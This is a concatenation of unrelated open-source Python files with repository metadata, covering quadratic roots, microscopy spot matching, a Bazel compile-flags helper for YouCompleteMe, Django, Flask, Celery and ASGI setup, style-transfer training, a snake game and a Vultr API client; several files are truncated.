91fa4adf813afeff4ee8cff082ebb2bd99d4723f | 269 | py | Python | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | import sys
import math
if __name__ == '__main__':
    # Quadratic coefficients a, b, c arrive as the three CLI arguments.
    coef_a, coef_b, coef_c = (int(arg) for arg in sys.argv[1:4])
    discriminant = coef_b * coef_b - 4 * coef_a * coef_c
    sqrt_d = math.sqrt(discriminant)
    # Print the '+' root first, then the '-' root, truncated to integers.
    for numerator in (-coef_b + sqrt_d, -coef_b - sqrt_d):
        print(int(numerator / (2 * coef_a)))
91fb5d86e0a2ace17209d7b5be31f349a8d3fe5f | 2,258 | py | Python | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 14 | 2021-03-10T12:52:02.000Z | 2022-03-14T19:46:03.000Z | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 6 | 2021-02-24T18:15:34.000Z | 2021-12-08T16:58:06.000Z | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 6 | 2021-01-20T03:57:14.000Z | 2022-02-04T22:16:46.000Z | import numpy as np
from fishspot.filter import white_tophat
from fishspot.detect import detect_spots_log
def blob_detection(
    image,
    min_blob_radius,
    max_blob_radius,
    **kwargs,
):
    """Detect blobs and return their coordinates with image intensities.

    Runs a white tophat filter sized to the largest expected blob, then a
    Laplacian-of-Gaussian spot detector; extra kwargs are forwarded to the
    detector. Returns an (n, 4) array: the first three columns are integer
    spot coordinates, the fourth is the image intensity at each spot.
    """
    background_removed = white_tophat(image, max_blob_radius)
    coords = detect_spots_log(
        background_removed,
        min_blob_radius,
        max_blob_radius,
        **kwargs,
    ).astype(int)
    values = image[coords[:, 0], coords[:, 1], coords[:, 2]]
    return np.hstack((coords[:, :3], values[..., None]))
def get_spot_context(image, spots, vox, radius):
    """Return [position, window] pairs for each spot.

    Each spot position (physical units) is mapped to a voxel index via
    ``vox``, and a cube of half-width ``radius`` voxels around that index
    is cut from ``image``.
    """
    results = []
    for position in spots:
        center = (position / vox).astype(int)
        lo = center - radius
        hi = center + radius + 1
        window = image[lo[0]:hi[0], lo[1]:hi[1], lo[2]:hi[2]]
        results.append([position, window])
    return results
def _stats(arr):
"""
"""
# compute mean and standard deviation along columns
arr = arr.astype(np.float64)
means = np.mean(arr, axis=1)
sqr_means = np.mean(np.square(arr), axis=1)
stddevs = np.sqrt( sqr_means - np.square(means) )
return means, stddevs
def pairwise_correlation(A, B):
    """All-pairs Pearson correlation between flattened spot contexts.

    ``A`` and ``B`` are lists of [position, window] pairs; entry (i, j) of
    the returned matrix is the correlation of A[i]'s window with B[j]'s.
    """
    # flatten every context window into a row vector
    a_ctx = np.array([entry[1].flatten() for entry in A])
    b_ctx = np.array([entry[1].flatten() for entry in B])

    # center each row about its mean
    a_mean, a_std = _stats(a_ctx)
    b_mean, b_std = _stats(b_ctx)
    a_ctx = a_ctx - a_mean[..., None]
    b_ctx = b_ctx - b_mean[..., None]

    # normalized dot products give the correlation matrix
    corr = np.matmul(a_ctx, b_ctx.T)
    corr = corr / a_std[..., None] / b_std[None, ...] / a_ctx.shape[1]

    # zero-variance contexts produce nan; treat them as uncorrelated
    corr[np.isnan(corr)] = 0
    return corr
def match_points(A, B, scores, threshold):
    """Pair each A-spot with its best-scoring B-spot above ``threshold``.

    Returns two arrays of matched positions (first three coordinate
    columns only), one for A and one for B.
    """
    a_pos = np.array([entry[0] for entry in A])
    b_pos = np.array([entry[0] for entry in B])
    # best candidate in B for every row of A
    best = np.argmax(scores, axis=1)
    best_scores = scores[np.arange(len(a_pos)), best]
    keep = best_scores > threshold
    # positions of corresponding points
    return a_pos[keep, :3], b_pos[best[keep], :3]
91fc1d22637f7a669f85b81d4edd4e86d5957148 | 8,736 | py | Python | .ycm_extra_conf.py | zaucy/bazel-compilation-database | aa58494efdf31c3e3525832b3d44d48bb3bc2b0b | [
"Apache-2.0"
] | 1 | 2021-04-23T03:47:31.000Z | 2021-04-23T03:47:31.000Z | .ycm_extra_conf.py | tsingakbar/bazel-compilation-database | a1d592dd8c3423c7fe94933ead4f098353ad4436 | [
"Apache-2.0"
] | null | null | null | .ycm_extra_conf.py | tsingakbar/bazel-compilation-database | a1d592dd8c3423c7fe94933ead4f098353ad4436 | [
"Apache-2.0"
] | 1 | 2020-11-14T00:11:51.000Z | 2020-11-14T00:11:51.000Z | #!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
    """Return a dict of key/value pairs parsed from `bazel info`.

    Exits the process quietly (status 0) when invoked outside a bazel
    workspace, which bazel signals with exit code 2.

    Returns:
        dict mapping bazel info keys (e.g. 'workspace', 'bazel-bin') to
        their string values.
    """
    bazel_info_dict = dict()
    try:
        out = subprocess.check_output([_BAZEL, 'info']).decode('utf-8').strip().split('\n')
    except subprocess.CalledProcessError as err:
        # This exit code is returned when this command is run outside of a bazel workspace.
        if err.returncode == 2:
            sys.exit(0)
        # Bug fix: the original fell through here with `out` unbound, which
        # raised UnboundLocalError below and masked the real bazel failure.
        # Re-raise the actual error instead.
        raise
    for line in out:
        key_val = line.strip().partition(": ")
        bazel_info_dict[key_val[0]] = key_val[2]
    return bazel_info_dict
def bazel_query(args):
    """Executes bazel query with the given args and returns the output."""
    # TODO: switch to cquery when it supports siblings and is less crash-y
    # with external repos.
    proc = subprocess.Popen([_BAZEL, 'query'] + args, stdout=subprocess.PIPE)
    stdout_data, _ = proc.communicate()
    return stdout_data.decode('utf-8')
def file_to_target(filepath):
    """Returns a string that works as a bazel target specification for the given file."""
    if not filepath.startswith("external/"):
        # Paths relative to the repo root (including genfiles and binfiles)
        # are already valid target specifications.
        return filepath
    # For external repos we must locate the owning package manually.
    repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
    filepath = re.sub('external/[^/]*/', '', filepath)
    # Ask bazel for every package in the repo; the owner is the longest
    # package that prefixes the file path.
    packages_out = bazel_query(['-k', repo_prefix + '...', '--output=package'])
    owner = ""
    for line in packages_out.split('\n'):
        package = line.strip()[len(repo_prefix):]
        if filepath.startswith(package) and len(package) > len(owner):
            owner = package
    return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
    """For file targets that are not source files, return the target that generated them.

    This is needed because rdeps of generated files do not include targets that reference
    their generating rules.
    https://github.com/bazelbuild/bazel/issues/4949
    """
    # Query bazel for this one target as XML so we can tell source files
    # apart from generated files.
    query_result = bazel_query(['--output=xml', file_target])
    if not query_result:
        sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
    target_xml = ElementTree.fromstringlist(query_result.split('\n'))
    # Source files are returned unchanged.
    source_element = target_xml.find('source-file')
    if source_element is not None:
        return file_target
    # Generated files map back to the rule that produces them.
    generated_element = target_xml.find('generated-file')
    if generated_element is not None:
        return generated_element.get('generating-rule')
    # Neither element present: the query XML has an unexpected shape.
    sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
    """Gets the file path for the generated aspects file that contains the
    compile commands json entries.
    """
    # Turn the bazel label into a relative path: ':' separates package and
    # target, and '@repo//' labels live under the 'external/' tree.
    path = re.sub(':', '/', label)
    path = re.sub('^@(.*)//', 'external/\\1/', path)
    path = re.sub('^/*', '', path)
    relative = path + '.compile_commands.json'
    return os.path.join(bazel_bin, *relative.split('/'))
def get_compdb_json(aspects_filepath, bazel_exec_root):
    """Returns the JSON string read from the file after necessary processing."""
    with open(aspects_filepath, 'r') as aspects_file:
        body = aspects_file.read()
    # The aspect writes bare entries; wrap them in brackets so the result
    # parses as a JSON array, then expand the exec-root placeholder.
    wrapped = "[\n" + body + "\n]"
    return re.sub('__EXEC_ROOT__', bazel_exec_root, wrapped)
def get_flags(filepath, compdb_json_str):
    """Gets the compile command flags from the compile command for the file."""
    for entry in json.loads(compdb_json_str):
        if entry['file'] == filepath:
            # Drop the compiler executable; keep only its arguments.
            return shlex.split(entry['command'])[1:]
    # This could imply we are fetching the wrong compile_commands.json or
    # there is a bug in aspects.bzl.
    sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
    """Modifies flags obtained from the compile command for compilation outside of bazel."""
    # Files symlinked into the execroot during a build disappear after a
    # different build action, so also search headers in the workspace itself.
    flags.extend(['-iquote', bazel_workspace])
    return flags
def cfamily_settings(filename):
    """Returns C-family settings as a dict with at least a 'flags' key that
    points to an array of strings as flags.

    Queries bazel for the cc rules that depend on `filename`, builds them
    with the compilation-database aspect attached, and extracts this file's
    compile flags from the generated JSON fragment.
    """
    bazel_info_dict = bazel_info()
    bazel_bin = bazel_info_dict['bazel-bin']
    bazel_genfiles = bazel_info_dict['bazel-genfiles']
    bazel_exec_root = bazel_info_dict['execution_root']
    bazel_workspace = bazel_info_dict['workspace']
    # Bazel target/path computations below are relative to the workspace root.
    os.chdir(bazel_workspace)
    # Valid prefixes for the file, in decreasing order of specificity.
    file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
                   if filename.startswith(p)]
    if not file_prefix:
        sys.exit("Not a valid file: " + filename)
    filepath = os.path.relpath(filename, file_prefix[0])
    file_target = standardize_file_target(file_to_target(filepath))
    # File path relative to execroot, as it will appear in the compile command.
    if file_prefix[0].startswith(bazel_exec_root):
        filepath = os.path.relpath(filename, bazel_exec_root)
    # Find the cc rules that directly depend on this file's target.
    cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
    query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
                                 .format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
    labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
    if not labels:
        sys.exit("No cc rules depend on this source file.")
    # Build the depending rules with the compilation-database aspect from
    # this repository, producing *.compile_commands.json fragments.
    repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
        os.path.realpath(__file__))
    aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
    bazel_aspects = [
        _BAZEL,
        'build',
        aspect_definition,
        repository_override,
        '--output_groups=compdb_files,header_files',
    ] + labels
    proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    if proc.returncode != 0:
        # Surface bazel's ERROR lines if present; otherwise raise raw stderr.
        # NOTE(review): under Python 3, `out`/`err` are bytes, so
        # e.startswith("ERROR:") would raise TypeError — confirm the intended
        # interpreter (the file imports print_function for py2/3 use).
        errors = [e for e in out.splitlines() + err.splitlines()
                  if e.startswith("ERROR:")]
        if errors:
            raise Exception('/'.join(errors))
        else:
            raise Exception(err)
    # Read flags for this file from the aspect output of the first label.
    aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
    compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
    flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
    return {
        'flags': flags,
        'include_paths_relative_to_dir': bazel_exec_root,
    }
#pylint: disable=C0103
def Settings(**kwargs):
    """YCM extra-conf entry point.

    Called by YouCompleteMe with ``language`` and ``filename`` keyword
    arguments; returns a dict of language-specific settings.  C-family
    files get compile flags from the bazel compilation database, every
    other language gets an empty dict.
    """
    if kwargs['language'] != 'cfamily':
        return {}
    return cfamily_settings(kwargs['filename'])
# For testing; needs exactly one argument: the path of a file.
if __name__ == '__main__':
    # Absolute path so the bazel workspace/execroot prefix checks inside
    # cfamily_settings match regardless of the caller's working directory.
    filename = os.path.abspath(sys.argv[1])
    print(Settings(language='cfamily', filename=filename))
| 37.333333 | 104 | 0.694254 |
91fc55bd294641a3405ae46e672d73216e1f79e0 | 450 | py | Python | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 10 | 2017-04-25T20:20:14.000Z | 2021-02-26T18:57:59.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 19 | 2018-08-09T20:45:51.000Z | 2021-11-29T17:47:21.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 8 | 2018-06-28T02:54:06.000Z | 2020-02-23T13:34:46.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
| 21.428571 | 50 | 0.615556 |
91fc8f01eba61ef1ef5ef0f60b821056938bce1a | 6,375 | py | Python | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | 1 | 2016-06-22T07:44:38.000Z | 2016-06-22T07:44:38.000Z | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | null | null | null | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | null | null | null | '''
x Total plays
x Total artists
x Total unique songs
Average song per artist
x Favourite track
Favourite artist (by plays or time)
Favourite album (req. api)
Average/total/unique plays per range
Average/total/unique artists per range
Average/total time listened per range
Favourite genre (req. api) (by plays or time)
% songs skipped before end (req. api)
Most skipped song/artist (req. api)
Graph of time of day listening
Graph of day of the week listening
Listening habits by Spotify values e.g. accousticness (req. api)
Search listening history
https://developer.spotify.com/web-api/
https://github.com/plamere/spotipy
http://spotipy.readthedocs.org/en/latest/
http://cgbystrom.com/articles/deconstructing-spotifys-builtin-http-server/
https://github.com/cgbystrom/spotify-local-http-api/issues/2
https://github.com/cgbystrom/spotify-local-http-api
http://effbot.org/zone/wcklib-calendar.htm
http://svn.python.org/projects/sandbox/trunk/ttk-gsoc/samples/ttkcalendar.py
'''
import time, datetime, StatifyCache, logging
# Songs read in order (date, Song) | 35.814607 | 192 | 0.570824 |
91fd994bcee3cd09c51e7f88b4c8df6b65341586 | 861 | py | Python | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 1 | 2022-03-26T20:01:55.000Z | 2022-03-26T20:01:55.000Z | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 4 | 2022-01-23T09:22:53.000Z | 2022-03-26T13:53:36.000Z | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 2 | 2022-03-17T19:12:41.000Z | 2022-03-30T09:58:50.000Z | from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework import permissions
from rest_framework.authentication import SessionAuthentication
# Keyword arguments shared by the drf-yasg schema view.
schema_view_param = {
    # Schema is generated for everyone, but rendering is gated below.
    'public': True,
    'permission_classes': (permissions.IsAdminUser,),
    # Optional external base URL; None falls back to the request host.
    'url': getattr(settings, 'SWAGGER_URL', None),
    'authentication_classes': (SessionAuthentication,),
}

# OpenAPI schema view describing this microservice's API.
schema_view = get_schema_view(
    openapi.Info(
        title=settings.MICROSERVICE_TITLE + ' API',
        default_version='v1',
        description='Microservice description',
    ),
    **schema_view_param,
)

urlpatterns = [
    # Swagger UI is additionally wrapped in login_required on top of the
    # IsAdminUser permission configured above.
    path(
        'swagger/', login_required(schema_view.with_ui('swagger', cache_timeout=0)), name='schema-swagger-ui'
    ),
]
| 28.7 | 109 | 0.738676 |
91fe1b9a7b1cd81006952efe0654f1a6e2066aa1 | 1,889 | py | Python | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 92 | 2017-02-13T22:35:54.000Z | 2021-04-28T09:56:02.000Z | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 4 | 2017-03-05T02:05:05.000Z | 2019-02-23T17:15:34.000Z | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 36 | 2017-02-24T09:35:57.000Z | 2021-05-21T17:42:03.000Z | #!/usr/bin/python
"""
Author: Mohamed K. Eid (mohamedkeid@gmail.com)
Description: trains a generative model for stylizing an unseen image input with a particular style
Args:
train: path to image with style to learn
"""
import argparse
import os
import tensorflow as tf
import generator
import helpers
import trainer
# Model Hyper Params
CONTENT_LAYER = 'conv3_3'
# Per-layer weights for the style loss; they must form a convex combination.
STYLE_LAYERS = {'conv1_2': .25, 'conv2_2': .25, 'conv3_3': .25, 'conv4_3': .25}
# Fixed grammar of the user-facing error message ("must up to 1").
assert sum(STYLE_LAYERS.values()) == 1, "Style layer weights must sum to 1"
EPOCHS = 30000
LEARNING_RATE = .001
TRAINING_DIMS = {'height': 256, 'width': 256}
RETRAIN = False

# Loss term weights
CONTENT_WEIGHT = 1.
STYLE_WEIGHT = .3
TV_WEIGHT = .1

# Default image paths (relative to this file's directory).
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_DIR_PATH = DIR_PATH + '/../lib/images/train2014/'
TRAINED_MODELS_PATH = DIR_PATH + '/../lib/generators/'
# Path of the style image to learn; filled in by parse_args().
TRAIN_PATH = None

# Logging params and config
PRINT_TRAINING_STATUS = True
PRINT_EVERY_N = 10
helpers.config_logging()

# Parse arguments and assign them to their respective global variables.
parse_args()

with tf.Session() as sess:
    with tf.variable_scope('generator'):
        gen = generator.Generator()
    t = trainer.Trainer(sess, gen, TRAIN_PATH, TRAINING_DIMS, PRINT_TRAINING_STATUS, PRINT_EVERY_N)
    t.train(EPOCHS, LEARNING_RATE, CONTENT_LAYER, CONTENT_WEIGHT, STYLE_LAYERS, STYLE_WEIGHT, TV_WEIGHT, RETRAIN)
    # NOTE(review): redundant inside the `with` block, which already closes
    # the session on exit; kept for backward compatibility.
    sess.close()
| 28.621212 | 117 | 0.728428 |
91ff58a8a89279f514514042538c466c72a92492 | 9,512 | py | Python | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
# Minimum margin (pixels) around the playfield.
MIN_MARGIN = 32
# Height (pixels) of the on-screen progress bar.
PROGRESS_BAR_HEIGHT = 8
# Absolute directory of this script, for locating bundled assets.
SELF_DIR = os.path.dirname(os.path.realpath(__file__))

if __name__ == '__main__':
    # main() is defined elsewhere in this file.
    main()
| 39.305785 | 80 | 0.527965 |
91ff5f7c6e601aeebe16cd2ed27293363ad42fda | 5,342 | py | Python | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)

# NOTE(review): the SQLAlchemy extension is bound to the app *before*
# SQLALCHEMY_DATABASE_URI is assigned below; some Flask-SQLAlchemy versions
# read the config at init time -- confirm this ordering, or move the config
# assignments above this line.
db = SQLAlchemy(app)

'''
1.
a. Sqlalchemy
b. db
c.
2.
a. db.Model
b. __tablename__
c.
d.
3.
4.
a. forpy
5. WTF
a.
b.
c. secret_key / / csrf_token
6.
a.
b. ID(for else / redirect / url_for )
c.
'''

# Database URI assembled from the settings star-imported out of
# flaskmodel.config (DIALECT, DRIVER, USERNAME, ...).
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# Secret key for session signing / WTForms CSRF tokens.
# NOTE(review): hard-coded secret; load from the environment for production.
app.secret_key = 'hbb'

if __name__ == '__main__':
    # One-off schema/seed helpers, kept commented out for reference:
    # db.create_all()
    # db.drop_all()
    #
    # au1 = Author(author_name = 'hbb')
    # au2 = Author(author_name = 'ry')
    # au3 = Author(author_name = 'rmf')
    # db.session.add_all([au1,au2,au3])
    # db.session.commit()
    #
    # bk1 = Book(book_name = '',author_id = au1.id)
    # bk2 = Book(book_name = '',author_id = au1.id)
    # bk3 = Book(book_name = '',author_id = au2.id)
    # bk4 = Book(book_name = '',author_id = au3.id)
    # bk5 = Book(book_name = '',author_id = au3.id)
    # db.session.add_all([bk1,bk2,bk3,bk4,bk5])
    # db.session.commit()
    app.run(debug=True)
| 29.513812 | 137 | 0.588731 |
91ffc327acbe66a0dfdec62b3fb9d0478e21a89a | 1,012 | py | Python | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | 1 | 2022-02-14T09:08:16.000Z | 2022-02-14T09:08:16.000Z | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | 5 | 2021-03-09T22:39:17.000Z | 2022-02-26T19:52:36.000Z | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | null | null | null | import asyncio
import json
from hypercorn.asyncio import serve
from hypercorn.config import Config
from bareasgi import Application, text_reader, text_writer
import bareutils.header as header
# bareASGI application; `info` is application-wide state handlers can read.
app = Application(info={'name': 'Michael Caine'})
# Same path, two methods: GET reads the info, POST replaces it (handlers
# get_info/set_info are defined elsewhere in this file).
app.http_router.add({'GET'}, '/info', get_info)
app.http_router.add({'POST'}, '/info', set_info)

# Serve with hypercorn on all interfaces, port 9009 (blocks until shutdown).
config = Config()
config.bind = ["0.0.0.0:9009"]
asyncio.run(serve(app, config))
| 27.351351 | 65 | 0.690711 |
620015da2fb2461bd1becafb3bfad88fa6ea66e6 | 567 | py | Python | memory/build_memory.py | ngowilliam1/more-contrastive | 50884c369145d19a39edabf56ecfdc02af1b42c4 | [
"Apache-2.0"
] | 70 | 2020-12-04T06:44:57.000Z | 2022-03-30T03:38:55.000Z | memory/build_memory.py | ngowilliam1/more-contrastive | 50884c369145d19a39edabf56ecfdc02af1b42c4 | [
"Apache-2.0"
] | 18 | 2020-12-31T03:57:35.000Z | 2021-10-21T06:41:41.000Z | infomin/build_memory.py | frank-xwang/CLD | 0852e5c3d0f0c28e85668b87b4fff20bd67e3efd | [
"MIT"
] | 6 | 2021-04-13T18:09:14.000Z | 2021-12-14T11:18:23.000Z | from .mem_bank import RGBMem, CMCMem
from .mem_moco import RGBMoCo, CMCMoCo
| 31.5 | 61 | 0.611993 |
6200daab351d8a43f810d28196ac2f8c75e8b726 | 803 | py | Python | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 3 | 2020-09-24T01:36:02.000Z | 2022-03-28T11:53:54.000Z | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | null | null | null | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 1 | 2020-12-08T05:14:23.000Z | 2020-12-08T05:14:23.000Z | # -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# Set the default Django settings module for the 'celery' program before
# the Celery app is instantiated.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')

app = Celery('Aves2')

# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
#   should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')

# Load task modules from all registered Django app configs.
app.autodiscover_tasks()

# Schedules and timestamps are interpreted in China Standard Time.
app.conf.timezone = 'Asia/Shanghai'

# Periodic (beat) task schedule; intentionally empty for now.
app.conf.beat_schedule = {
}
| 27.689655 | 66 | 0.775841 |
62011193ee986970753cb1015967250f10e93794 | 14,374 | py | Python | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 8 | 2018-09-25T03:28:11.000Z | 2021-12-15T07:44:38.000Z | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 1 | 2020-12-21T10:56:44.000Z | 2020-12-21T10:56:44.000Z | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 2 | 2018-09-25T03:28:18.000Z | 2021-12-15T10:28:35.000Z | from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
# Any statement accepted by the AST-to-SSA translation: a plain HDL
# assignment or an HLS stream-processing statement.
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
| 45.487342 | 136 | 0.64881 |
6202a8816bac81aec1be652ea835f294593e8695 | 12,009 | py | Python | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 4 | 2021-12-01T18:06:18.000Z | 2022-01-22T12:39:52.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-19T14:05:42.000Z | 2021-12-19T14:05:42.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-20T04:54:08.000Z | 2021-12-20T04:54:08.000Z | from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoadBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
